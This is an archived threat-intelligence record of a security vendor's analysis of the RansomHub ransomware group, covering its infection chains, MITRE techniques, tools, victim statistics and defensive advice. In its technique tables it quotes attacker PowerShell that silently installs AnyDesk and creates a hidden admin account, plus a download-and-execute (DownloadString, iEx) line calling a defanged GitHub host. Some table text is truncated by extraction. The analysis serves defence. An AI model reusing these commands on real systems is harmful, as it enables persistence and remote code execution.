{
	"id": "579da2c6-3dcd-454b-9ba2-731db4cff47c",
	"created_at": "2026-04-29T02:21:56.739561Z",
	"updated_at": "2026-04-29T08:22:27.409558Z",
	"deleted_at": null,
	"sha1_hash": "5526f8cfcb8330fcbfb47450ab5cc83902f2aa71",
	"title": "Ransomware Spotlight: Ransomhub",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1059486,
	"plain_text": "Ransomware Spotlight: Ransomhub\r\nArchived: 2026-04-29 02:05:01 UTC\r\nX\r\nInfection chain and techniques\r\nThe following section details the initial infection chain observed from RansomHub activity as illustrated in Figure 1.\r\nInitial Access\r\nThe RansomHub ransomware group use spear-phishing voice scams for initial access. The cybercriminals use social\r\nengineering to orchestrate victim account password resets, employing speakers with a convincing American accent to\r\nlure victims. RansomHub also possibly uses compromised VPN accounts.\r\nExecution\r\nOperators behind RansomHub use PsExec to execute commands remotely on the victim’s machine. They have also\r\nbeen observed to use Powershell scripts to execute commands related to credential access, discover remote systems,\r\nestablish SSH connections.\r\nThey have also been observed to use Python scripts to establish SSH connections, transfer the encryptor via Secure\r\nFile Transfer Protocol (SFTP), and execute the encryptor simultaneously across multiple servers.\r\nPersistence\r\nRansomHub uses a local account to maintain access and adds the created user to administrator groups to maintain\r\nelevated access.\r\nDefense Evasion\r\nRansomHub drops and executes a batch file named disableAV.bat detected as Trojan.BAT.KAPROCHANDLER.A. It\r\ncopies and executes the binary used to terminate and delete antivirus-related processes and files. The binary used,\r\ndetected as STONESTOP, uses a signed driver, detected as POORTRY, to delete files and terminate processes that are\r\nrelated to antivirus products.\r\nThe ransomware also uses another batch file to delete multiple registry subkeys and entries intended to bypass virus\r\nand threat protection settings in Windows.\r\nRansomHub also uses TDSSKiller to disable antivirus or EDR solutions in the target system and\r\nTOGGLEDEFENDER to disable Windows Defender.\r\nThe ransomware group also uses EDR Kill Shifter that functions as a loader executable that utilizes the Bring Your\r\nOwn Vulnerable Driver (BYOVD) technique. It exploits different vulnerable drivers to disable EDR protection.\r\nThe ransomware group also uses IOBit Unlocker to unlock files and folders that are locked by other processes or\r\nprograms.\r\nCredential Access\r\nRansomHub uses MIMIKATZ, LaZagne, and SecretServerSecretStealer to retrieve passwords and credentials on\r\ntheir victim’s machines.\r\nThe ransomware group has also been observed to exploit the Veeam Backup \u0026 Replication component vulnerability\r\nCVE-2023-27532, where they connected to the Veeam.Backup.Service.exe on TCP/9401, created a network share,\r\nand then created and executed a Powershell script to dump credentials from the Veeam database to a text file. The\r\ngroup was also seen using Veeamp which is a credential dumping tool specifically designed to extract credentials\r\nfrom a SQL database utilized by Veeam backup management software.\r\nA sample from the ransomware group has also been observed to conduct a brute force attack on the domain controller\r\nwhich was followed by a ntlmv1 logon to the domain controller. The group has also been observed extracting the\r\nNTDS.dit file which is a database that stores the Active Directory data including users, groups, security descriptors\r\nand password hashes.\r\nRansomHub also uses a PowerShell script that interacts with the CyberArk Privileged Access Security (PAS) solution\r\nto pull account information from safes and export it to a CSV file.\r\nDiscovery\r\nRansomHub operators use NetScan to discover and retrieve information about network devices. They also use\r\nAdvanced Port Scanner to scan for open ports on network computers.\r\nhttps://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomhub\r\nPage 1 of 14\n\nLateral Movement\r\nRansomHub ransomware uses the cmd command xcopy/copy to transfer the binary and driver used to terminate and\r\ndelete anti-virus related processes and files, respectively. The group employs a PowerShell script to connect to a\r\nvCenter Server, retrieve all ESXi hosts, and configures the SSH service on each host to start automatically, enabling\r\nexternal SSH connections. The script also has the capability to reset the ESXi root user password and then disconnect\r\nfrom the vCenter Server.\r\nRansomHub operators also use a SMB spreader that uses Impacket, which was provided to RansomHub affiliates.\r\nThe SMB spreader runs a specified ransomware executable over the affected system’s local network.\r\nThe group also used SFTP to transfer the encryptor.\r\nCommand and Control\r\nRansomHub operators use Atera, Splashtop, AnyDesk, Ngrok, Screen Connect and Remmina to to gain access on\r\nvictim machines remotely.\r\nImpact\r\nRansomHub ransomware uses two encryption algorithms to encrypt target files: ECDH and AES. The ransomware\r\nthen appends the 32-byte master public key from its configuration to the end of each encrypted file. The ransomware\r\nbinary requires a -pass argument with a 32-byte passphrase to be specified when the ransomware is executed. The 32-\r\nbyte passphrase is used to decrypt an embedded configuration during runtime which contains the file extensions, file\r\nnames, and folders to avoid, processes and services to terminate, as well as compromised login accounts.\r\nExfiltration\r\nRansomHub ransomware has been detected using the third-party tool and web-service RClone to exfiltrate to stolen\r\ninformation.\r\nFigures 2 and 3 illustrate the RansomHub infection chain from its observed campaigns in the fourth quarter of 2024.\r\nopen on a new tab\r\nFigure 2. The RansomHub infection chain that uses NODESTEALER and XWORM\r\nopen on a new tab\r\nFigure 3. RansomHub infection that uses a modified Secure Common Uninstall Tool (SCUT)\r\nThe following section details RansomHub infection chains that we investigated from the group’s observed campaigns in the\r\nfourth quarter of 2024.\r\nInitial Access\r\nRansomHub operators in their campaigns in the second half of 2024 until early 2025 were observed to use\r\nSocGholish which typically utilizes drive-by compromises and social engineering tactics to trick users into\r\ndownloading a malicious JavaScript payload masquerading as a browser update. After the execution of the initial\r\nhttps://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomhub\r\nPage 2 of 14\n\npayload, the malware establishes a command-and-control (C\u0026C) channel, allowing adversaries to perform further\r\nmalicious actions.\r\nExecution\r\nRansomHub operators used Winhelper.ps1, x.ps1 and vcruntime.py to download and execute files and scripts from a\r\nGitHub repository.\r\nPrivilege Escalation\r\nThe RansomHub campaigns from the second half of 2024 to early 2025 showed the use of PowerRun, which is\r\ndesigned to run programs with TrustedInstaller (TI) privileges that usually provide higher permissions compared to\r\nAdministrator privileges. This tool exploits Windows commands to elevate privileges and bypass standard security\r\ncontrols.\r\nCredential Access\r\nRansomHub uses NODESTEALER to retrieve browser cookies and login credentials from the victim’s system.\r\nDiscovery\r\nRansomHub operators also use nbtscan to conduct internal reconnaissance within a compromised network. It can also\r\nbe used to scan IP networks, list NetBIOS computer names, collect MAC addresses, and list active users on a system.\r\nCommand and Control\r\nRansomHub also uses XWORM to connect to a command and control server, COBEACON for command execution\r\nand other functions, Python SOCKS5 Proxy Client to maintain access to compromised endpoints and deploy\r\nencryptors, Betruger for the uploading of files to the C\u0026C server and other functions, and Configure-SMRemoting to\r\nconfigure and enable PowerShell remoting on Windows systems.\r\nDefense Evasion\r\nRansomHub threat actors were observed using a modified version of the legitimate Secure Common Uninstall Tool\r\n(SCUT) to remove the verification of the JWT token and whether the process was launched by a Trend Micro\r\nprocess. This modification allows attackers to mimic legitimate processes and perform malicious actions.\r\nRansomHub threat actors also used AMSI Bypass Patcher to alter the behavior of the AmsiScanBuffer function by\r\nlocating and altering the memory address of the AmsiScanBuffer function within amsi.dll, which then allows\r\npotentially malicious code to bypass AMSI's detection mechanisms and execute without being flagged.\r\nThe RansomHub ransomware group also used GMER to detect and remove toolkits, as well as Uninstall-CS-ISG.bat,\r\nwhich is a batch file disguised as a CrowdStrike uninstall script, to transfer tools, uninstall CrowdStrike and Apex\r\nOne agents, and execute the ransomware payload.\r\nExfiltration\r\nRansomHub threat actors in their observed campaigns from the second half of 2024 to early 2025 used MEGAsync,\r\nwhich is an installable application that synchronizes folders between computers and MEGA Cloud Drives.\r\nImpact\r\nRansomHub actors used VeraCrypt to encrypt backup storage devices.\r\nMITRE tactics and techniques\r\nIn this section, we detail two MITRE tactics and techniques from the different campaigns we have observed from the\r\nRansomHub ransomware family. The first table enumerates the different MITRE tactics that the ransomware family used in\r\nits first observed campaign in the first half of 2024.\r\nInitial Access Execution Persistence Privilege Escalation D\r\nT1078 - Valid\r\nAccounts\r\nThe\r\nransomware\r\nT1059.001 - Command and Scripting Interpreter:\r\nPowerShell\r\n• Based on external reportsopen on a new tab, the\r\nransomware group uses PowerShell scripts to execute\r\nT1136.001 - Create Account:\r\nLocal Account\r\nThe ransomware group was\r\nable to execute command via\r\nT1078.003 - Valid\r\nAccounts: Local Accounts\r\nIf -safeboot is passed as an\r\nargument, the ransomware\r\nT\r\nT\r\ns\r\nhttps://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomhub\r\nPage 3 of 14\n\nInitial Access Execution Persistence Privilege Escalation D\r\ngroup could\r\nhave possibly\r\nused\r\ncompromised\r\nVPN\r\naccounts.\r\nT1566.004 -\r\nPhishing:\r\nSpearphishing\r\nVoice\r\nBased on\r\nexternal\r\nreportsopen\r\non a new tab,\r\nthe\r\nransomware\r\ngroup uses\r\nsocial\r\nengineering\r\nto orchestrate\r\nvictim\r\naccount\r\npassword\r\nresets,\r\nparticularly\r\nwith\r\nAmerican-accented\r\nspeakers\r\ncommands related to credential access, discover remote\r\nsystems, and enable SSH service.\r\n• The ransomware group also used a PowerShell script to\r\ndownload AnyDesk:\r\nFunction AnyDesk { mkdir \"C:\\ProgramData\\AnyDesk\" #\r\nDownload AnyDesk $clnt = new-object\r\nSystem.Net.WebClient $url =\r\n\"hxxp://download[.]anydesk[.]com/AnyDesk.exe\" $file =\r\n\"C:\\ProgramData\\AnyDesk.exe\"\r\n$clnt.DownloadFile($url,$file) cmd.exe /c\r\nC:\\ProgramData\\AnyDesk.exe --install\r\nC:\\ProgramData\\AnyDesk --start-with-win --silent cmd.exe\r\n/c echo {redacted} | C:\\ProgramData\\anydesk.exe --set-password net user {redacted} \"{redacted}\" /add net\r\nlocalgroup Administrators {redacted} /ADD reg add\r\n\"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\r\nNT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist\" /v\r\n{redacted} /t REG_DWORD /d 0 /f cmd.exe /c\r\nC:\\ProgramData\\AnyDesk.exe --get-id }\r\nT1059.006 - Command and Scripting Interpreter: Python\r\nBased on external reportsopen on a new tab, the\r\nransomware group utilizes a customized Python script to\r\nestablish an SSH connection with targeted ESXi servers,\r\ntransfer the encryptor via SFTP, confirm the successful\r\ntransfer, and execute the encryptor simultaneously across\r\nmultiple servers.\r\nT1059.003 - Command and Scripting Interpreter: Windows\r\nCommand Shell\r\nThe ransomware binary accepts the following parameters:\r\nopen on a new tab\r\nOther versions of the RansomHub accepts the following\r\ncommand line parameters:\r\nopen on a new tab\r\nIt can also execute supplied commands before its encryption\r\nroutine by using the -cmd {command to execute} parameter.\r\nthe net command-line utility to\r\ncreate a local account,\r\nmaintaining access to victim\r\nsystems.\r\nT1098 - Account Manipulation\r\nThe ransomware group was\r\nable to execute command via\r\nthe net command-line utility to\r\nadd created user account to the\r\nadministrator groups to\r\nmaintain elevated access.\r\nT1547.001 - Boot or Logon\r\nAutostart Execution: Registry\r\nRun Keys / Startup Folder\r\nIf -safeboot is passed as an\r\nargument, the ransomware\r\nbinary adds the following\r\nentries to the\r\nSOFTWARE\\Microsoft\\Windows\r\nNT\\CurrentVersion\\RunOnce\r\nregistry key to execute itself\r\nupon reboot:\r\n*zCCyEs = {Malware File\r\nPath}\\{Malware File Name} -\r\nsafeboot-instance -pass {32-\r\nbyte passphrase}\r\nT1547 - Boot or Logon\r\nAutostart Execution\r\n• The ransomware binary\r\nenables automatic logon by\r\nadding the following registry\r\nentries in the\r\nSOFTWARE\\Microsoft\\Windows\r\nNT\\CurrentVersion\\Winlogon.\r\n• The credentials are then saved\r\nto a text file named user.txt. The\r\nlogin information is also\r\ndisplayed in the console.\r\nAutoAdminLogon = 1\r\nDefaultUserName =\r\nAdministrator\r\nDefaultDomainName =\r\nDefaultPassword = {random\r\ncharacters}\r\nbinary attempts to login as\r\nthe administrator using the\r\ncompromised usernames\r\nand passwords included in\r\nthe credentials key in the\r\nencrypted configuration\r\nusing the API\r\nLogonUserW. If the login\r\nattempt fails it enables\r\nautomatic logon.\r\nT1134.001 - Access Token\r\nManipulation: Token\r\nImpersonation/Theft\r\nThe ransomware binary\r\ncan impersonate a logged-on user's security context\r\nusing a call to the\r\nImpersonateLoggedOnUser\r\nAPI.\r\nR\r\nth\r\nT\r\nB\r\na\r\nr\r\nr\r\nr\r\nr\r\nr\r\nr\r\nS\r\nr\r\nr\r\nr\r\nr\r\n\"\r\n/f\r\nr\r\n\"\r\nS\r\nT\r\nT\r\nr\r\nc\r\nc\r\nT\r\nT\r\nT\r\nU\r\nu\r\n•\r\n•\r\n•\r\nT\r\ne\r\nL\r\nT\r\nT\r\np\r\nT\r\nI\r\nr\r\nc\r\nc\r\nL\r\nsy\r\na\r\nT\r\nI\r\nv\r\nu\r\nb\r\nhttps://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomhub\r\nPage 4 of 14\n\nInitial Access Execution Persistence Privilege Escalation D\r\nThe following table details the MITRE tactics from its campaigns in the fourth quarter of 2024; while there are similarities\r\nwith the TTPs used in the groups previous campaign in March 2024, there are also key differences that show how threat\r\nactors are continuously adapting more sophisticated techniques to circumnavigate defenses.\r\nhttps://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomhub\r\nPage 5 of 14\n\nInitial Access Execution\r\nhttps://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomhub\r\nPage 6 of 14\n\nInitial Access Execution\r\nT1566.001 - Phishing:\r\nSpearphishing Attachment\r\nBased on our investigation, the\r\nthreat actor likely utilized a\r\nphishing email containing a\r\nmalicious ZIP file. Inside the\r\nZIP file is a binary file\r\nmasquerading as a PDF, which\r\ntriggers the execution of the\r\nPowerShell script\r\nWinHelper.ps1 using the\r\ncommand:\r\nPowerShell -ep bypass -w\r\nhidden -f\r\nC:\\Users\\Public\\WinHelper.ps1\r\nT1059.001 - Command and Scripting Interpreter: PowerShelll\r\nThe group was also observed to use a PowerShell downloader named WinHelper.ps1 to retrieve and execute another\r\nGitHub repository.\r\n$url='hxxps[://]raw[.]githubusercontent[.]com/poseidon1338/sp02/refs/heads/main/s' $url2='' $tExt20=((New-Ob\r\nSystem[.]Net[.]WebClient).DoWnloAdString('hxxps[://]raw[.]githubusercontent[.]com/poseidon1338/PowerShell/\r\niEx $text20\r\nRansomHub also used another PowerShell script named x.ps1 to download and extract an archived Python environm\r\nto C:\\WinExplorer directory with the following steps:\r\n• The script first downloads a ZIP file from a Dropbox link and saves it as WinHelper.zip in C:\\WinExplorer\\.\r\nopen on\r\n•It then uses Expand-Archive to extract the downloaded ZIP file into the C:\\WinExplorer\\ directory.\r\nopen on\r\nThey also used the PowerShell script to create and execute Python files that will establish persistence and download\r\nscript from a GitHub repository with the following steps:\r\n•The script reads the content of a file (Gimport.dat) and stores it in $stct and $stct2, replaces placeholders %up% w\r\n$url2, and writes the modified content into two new Python files: vcruntime140.py and vcruntime140d.py.\r\nopen on a new tab\r\n•The script then executes the Python interpreter (python.exe) located in C:\\WinExplorer\\ to run the two generated Py\r\n(vcruntime140.py and vcruntime140d.py).\r\nopen on\r\nIn the previously mentioned February 2025 incident, a PowerShell script named 111.ps1 was used to execute diskpa\r\nT1059.006 - Command and Scripting Interpreter: Python\r\nThe group also dropped the Python scripts named vcruntime140.py and vcruntime140d.py that ensures persistence b\r\nin the startup folder to execute them when the system reboots.\r\nT1059.003 - Command and Scripting Interpreter: Windows Command Shell\r\nThe group used a batch file disguised as a CrowdStrike uninstall script to transfer tools, uninstall CrowdStrike and A\r\nexecute the ransomware payload.\r\nOur investigation of the February 2025 incident showed that a batch file named g.bat was created which was used t\r\nthe victim's machine.\r\nhttps://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomhub\r\nPage 7 of 14\n\nInitial Access Execution\r\nSummary of malware, tools, and exploits used\r\nTable 1 summarizes the malware, techniques, and tools used for by RansomHub actors in their initial infection chain that we\r\nfirst observed.\r\nExecution\r\nPrivilege\r\nEscalation\r\nCredential Access\r\nLateral\r\nMovement\r\nDiscovery\r\nCommand and\r\nControl\r\nDefense Evasio\r\nPsExec\r\nCVE-2020-\r\n1472\r\nMIMIKATZ\r\nLaZagne\r\nCVE-2023-27532\r\nSecretServerSecretStealer\r\nVeeamp\r\nSMB\r\nSpreader\r\nNetScan\r\nAdvanced\r\nPort\r\nScanner\r\nAtera\r\nSplashtop\r\nAnyDesk\r\nNgrok\r\nRemmina\r\nConnectWise\r\nScreen\r\nConnect\r\nPOORT\r\nSTONE\r\nTOGGL\r\nTDSSK\r\nEDR Ki\r\nIOBit U\r\nTable 1. Malware, techniques, and tools used in the RansomHub initial infection chain\r\nTable 2 lists the malware and tools used in the RansomHub infection chains that uses NODESTEALER, XWORM, ad a\r\nmodified Secure Common Uninstall Tool (SCUT).\r\nhttps://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomhub\r\nPage 8 of 14\n\nInitial Access Execution\r\nPrivilege\r\nEscalation\r\nCredential Access Discovery\r\nCommand and\r\nControl\r\nDefense E\r\nSocGholish\r\nWinHelper.ps1\r\nx.ps1\r\nvcruntime.py\r\nPowerRun NODESTEALER nbtscan\r\nXWORM\r\nCOBEACON\r\nPython\r\nSOCKS5\r\nProxy Client\r\nBetruger\r\nConfigure-SMRemoting\r\nMo\r\nSec\r\nCo\r\nUn\r\nToo\r\n(SC\r\nAM\r\nByp\r\nPat\r\nDep\r\nIma\r\nSer\r\nMa\r\nToo\r\n(DI\r\nGM\r\nUn\r\nCS\r\nTable 2. Malware, techniques, and tools used in the RansomHub initial infections from November 2024 that used\r\nNODESTEALER, XWORM, ad a modified Secure Common Uninstall Tool (SCUT).\r\nTop affected countries and industries from Trend Micro threat intelligence\r\nIn this section, we outline the activity of both the RansomHub ransomware and the Knight ransomware as investigations\r\nsuggest that the two are related. RansomHub was first reported in February 2024, but the first instance of an attempted\r\nattack in Trend Micro-covered systems was in April 2024. The Knight ransomware, on the other hand, has been active since\r\nJanuary this year, when we began to track it in our telemetry. While it has been previously mentioned that RansomHub was\r\ndeclared inactive since April after the DragonForce takeover, Trend telemetry counted detections until July, when our\r\nendpoint sensors identified detection names connected to RansomHub.\r\nopen on a new tab\r\nFigure 4. A monthly breakdown of attempted attacks from Knight ransomware and RansomHub ransomware (January 2024\r\nto July 2025)\r\nKnight ransomware’s top targeted countries include Brazil, Türkiye, the United States, Ireland, and Israel, while\r\nRansomHub focused their efforts in targeting enterprises from the United States and Malaysia. Note that the country data for\r\nRansomHub and Knight ransomware do not include October 2024 to February 2025 detections due to a retention limitation\r\nin our telemetry at the time of writing. Figure 3 will be updated once more data is available.\r\nhttps://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomhub\r\nPage 9 of 14\n\nopen on a new tab\r\nFigure 5. A breakdown of the top countries targeted by the Knight and RansomHub ransomware groups (January to\r\nSeptember 2024, April to July 2025)\r\nWhile many customers chose not to specify the industry in which they belong, data from those that did reveal that Knight\r\nransomware targeted financial institutions the most, while RansomHub ransomware targeted the education sector the most.\r\nNote that the industry data for RansomHub and Knight ransomware do not include detections from October 2024 to\r\nFebruary 2025 due to a retention limitation in our telemetry at the time of writing. Figure 3 will be updated once more data\r\nis available.\r\nopen on a new tab\r\nFigure 6. A breakdown of the top industries targeted by the Knight and RansomHub ransomware groups (January –\r\nSeptember 2024, April to July 2025)\r\nTargeted regions and industries according to RansomHub ransomware’s leak site\r\nThis section looks at data based on attacks recorded on the leak site of the RansomHub ransomware and a combination of\r\nour open-source intelligence (OSINT) research and an investigation from February 2024 to March 2025.\r\nThe gang has so far added at least 748 victims to its leak site, but the actual victim count is likely higher.\r\nOf the total number of revealed victims, the RansomHub ransomware targeted enterprises in the North American region the\r\nmost.  \r\nopen on a new tab\r\nhttps://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomhub\r\nPage 10 of 14\n\nFigure 7. The distribution by region of the RansomHub ransomware’s victim organizations, excluding victims with unknown\r\nlocations\r\nSources: RansomHub ransomware’s leak site and Trend Micro’s OSINT research (February 2024 to March 2025)\r\nRansomHub targeted enterprises in the United State the most. The gang launched attacks on other countries fewer times, but\r\ntheir total of 748 victims comes from a wide range of at least 75 countries.\r\ntrendmicro -articleopen on a new tab\r\nFigure 8. The top 10 countries targeted by the RansomHub ransomware\r\nSources: RansomHub ransomware’s leak site and Trend Micro’s OSINT research (February 2024 to March 2025)\r\nMajority of the RansomHub ransomware’s victim organizations were small businesses. The gang targeted medium\r\nbusinesses 65 times, and large enterprises only 38 times.\r\nopen on a new tab\r\nFigure 9. The distribution by organization size of RansomHub’s victim organizations\r\nSources: RansomHub ransomware’s leak site and Trend Micro’s OSINT research (February 2024 to March 2025)\r\nThere are no outstanding sectors that RansomHub prefers to target, as their victimology by industry is spread out across\r\nsectors; however, the sector with the most attack counts as revealed by their leak site are from the IT sector.\r\nhttps://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomhub\r\nPage 11 of 14\n\nopen on a new tab\r\nFigure 10. A breakdown of the top 10 industries targeted by RansomHub ransomware attacks\r\nSources: RansomHub ransomware’s leak site and Trend Micro’s OSINT research (February 2024 to March 2025)\r\nTrend Micro Vision One Threat Intelligence\r\nTo stay ahead of evolving threats, Trend Micro customers can access a range of Intelligence Reports and Threat Insights\r\nwithin Trend Micro Vision One. Threat Insights helps customers stay ahead of cyber threats before they happen and better\r\nprepared for emerging threats. It offers comprehensive information on threat actors, their malicious activities, and the\r\ntechniques they use. By leveraging this intelligence, customers can take proactive steps to protect their environments,\r\nmitigate risks, and respond effectively to threats.\r\nTrend Micro Vision One Intelligence Reports App [IOC Sweeping]\r\nThe following can be searched in the Trend Vision One Intelligence Reports dashboard for IOC sweeping:\r\nRansomHub Attacks Surge: New Anti-EDR Tactics Unveiled and AMADEY Infrastracture Connection\r\n[Hot Threats]: New Indicators for RANSOMHUB Ransomware -\r\nNew RansomHub attack uses TDSKiller and LaZagne, disables EDR\r\nStopRansomware: RansomHub Ransomware\r\nTrend Micro Vision One Threat Insights App\r\nTrend Vision One Hunting Query\r\nTrend Vision One customers can use the Search App to match or hunt the malicious indicators mentioned in this feature with\r\ndata in their environment.\r\nRansomHub Ransomware VSAPI Detections and Ransom Note:\r\nmalName:(*RANSOMHUB* or *KNIGHT*) AND eventName: MALWARE_DETECTION AND FileFullPath:(\"*\\\\README_*\")\r\nRansomHub Ransomware Process Execution:\r\nprocessCmd:\"/*cmd.exe /c iisreset.exe /stop*/\" AND processCmd:\"*powershell.exe -Command PowerShell -Command \"\\\r\nMore hunting queries are available for Vision One customers with Threat Insights Entitlement enabledopen on a new tab.\r\nRecommendations\r\nRansomHub ransomware is the latest evidence that cybercriminals are easy to respawn and work together with other groups\r\nto maximize profits from their extortion schemes. Its links to the people behind BlackCat and Knight ransomware make it a\r\nformidable threat worth watching out for, especially as the group’s victimology in less than a year of activity suggests\r\nfrequent and aggressive attacks.\r\nTo protect systems against RansomHub ransomware and other similar threats, organizations can implement security\r\nframeworks that allocate resources systematically to establish a strong defense strategy.\r\nThe following are some best practices that organizations can consider to help protect themselves from ransomware\r\ninfections:\r\nAudit and inventory\r\nTake an inventory of assets and data \r\nIdentify authorized and unauthorized devices and software \r\nMake an audit of event and incident logs \r\nhttps://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomhub\r\nPage 12 of 14\n\nConfigure and monitor\r\nManage hardware and software configurations \r\nGrant admin privileges and access only when necessary to an employee’s role \r\nMonitor network ports, protocols, and services \r\nActivate security configurations on network infrastructure devices such as firewalls and routers \r\nEstablish a software allow list that only executes legitimate applications \r\nPatch and update\r\nConduct regular vulnerability assessments\r\nPerform patching or virtual patching for operating systems and applications \r\nUpdate software and applications to their latest versions \r\nProtect and recover\r\nImplement data protection, backup, and recovery measures \r\nEnable multifactor authentication (MFA) \r\nSecure and defend\r\nEmploy sandbox analysis to block malicious emails \r\nDeploy the latest versions of security solutions to all layers of the system, including email, endpoint, web, and\r\nnetwork \r\nDetect early signs of an attack such as the presence of suspicious tools in the system \r\nUse advanced detection technologies such as those powered by AI and machine learning\r\nTrain and test\r\nRegularly train and assess employees on security skills \r\nConduct red-team exercises and penetration tests\r\nA multilayered approach can help organizations guard the possible entry points into the system (endpoint, email, web, and\r\nnetwork). Security solutions can detect malicious components and suspicious behavior could help protect enterprises.\r\nTrend Vision One™ – Endpoint Securityopen on a new tab provides multilayered prevention and protection\r\ncapabilities across every stage of the attack chain. Industry-leading intrusion prevention empowers you to\r\nmitigate known but unpatched threats that can help block questionable behavior and tools early on before the\r\nransomware can do irreversible damage to the system. Predict if files are malicious and detect indicators of\r\nattack before they get a chance to execute.\r\nTrend Vision One™ – Cloud Securityopen on a new tab provides advanced server security for physical,\r\nvirtual, and cloud servers through file integrity monitoring, server intrusion prevention, and container security.\r\nIt protects enterprise applications and data from breaches and business disruptions without requiring\r\nemergency patching.\r\nTrend Vision One™ – Email and Collaboration Securityopen on a new tab monitors employee risk levels in\r\nreal-time with email user risk assessments, swiftly detects and responds to user-targeted threats, and\r\nimplement email security and prevention measures to disrupt the attack chain and effectively mitigate risk.\r\nHIDE\r\nLike it? Add this infographic to your site:\r\n1. Click on the box below.   2. Press Ctrl+A to select all.   3. Press Ctrl+C to copy.   4. Paste the code into your page\r\n(Ctrl+V).\r\nImage will appear the same size as you see above.\r\nWe Recommend\r\nThe Industrialization of Botnets: Automation and Scale as a New Threat Infrastructurenews article\r\nComplexity and Visibility Gaps in Power Automatenews article\r\nCracking the Isolation: Novel Docker Desktop VM Escape Techniques Under WSL2news article\r\nAzure Control Plane Threat Detection With TrendAI Vision One™news article\r\nThe AI-fication of Cyberthreats: Trend Micro Security Predictions for 2026predictions\r\nhttps://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomhub\r\nPage 13 of 14\n\nRansomware Spotlight: DragonForcenews article\r\nStay Ahead of AI Threats: Secure LLM Applications With Trend Vision Onenews article\r\nThe Road to Agentic AI: Navigating Architecture, Threats, and Solutionsnews article\r\nSource: https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomhub\r\nhttps://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomhub\r\nPage 14 of 14",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomhub"
	],
	"report_names": [
		"ransomware-spotlight-ransomhub"
	],
	"threat_actors": [
		{
			"id": "1b1271d2-e9a2-4fc5-820b-69c9e4cfb312",
			"created_at": "2024-06-07T02:00:03.998431Z",
			"updated_at": "2026-04-29T06:58:56.876406Z",
			"deleted_at": null,
			"main_name": "RansomHub",
			"aliases": [],
			"source_name": "MISPGALAXY:RansomHub",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "6608b798-f92b-42af-a93f-d72800eeb3a3",
			"created_at": "2023-11-30T02:00:07.292Z",
			"updated_at": "2026-04-29T06:58:56.71531Z",
			"deleted_at": null,
			"main_name": "DragonForce",
			"aliases": [],
			"source_name": "MISPGALAXY:DragonForce",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "843f4240-33a7-4de4-8dcf-4ff9f9a8c758",
			"created_at": "2025-07-24T02:05:00.538379Z",
			"updated_at": "2026-04-29T06:58:57.518246Z",
			"deleted_at": null,
			"main_name": "GOLD FLAME",
			"aliases": [
				"DragonForce"
			],
			"source_name": "Secureworks:GOLD FLAME",
			"tools": [
				"ADFind",
				"AnyDesk",
				"Cobalt Strike",
				"FileSeek",
				"Mimikatz",
				"SoftPerfect Network Scanner",
				"SystemBC",
				"socks.exe"
			],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1777429316,
	"ts_updated_at": 1777450947,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/5526f8cfcb8330fcbfb47450ab5cc83902f2aa71.pdf",
		"text": "https://archive.orkl.eu/5526f8cfcb8330fcbfb47450ab5cc83902f2aa71.txt",
		"img": "https://archive.orkl.eu/5526f8cfcb8330fcbfb47450ab5cc83902f2aa71.jpg"
	}
}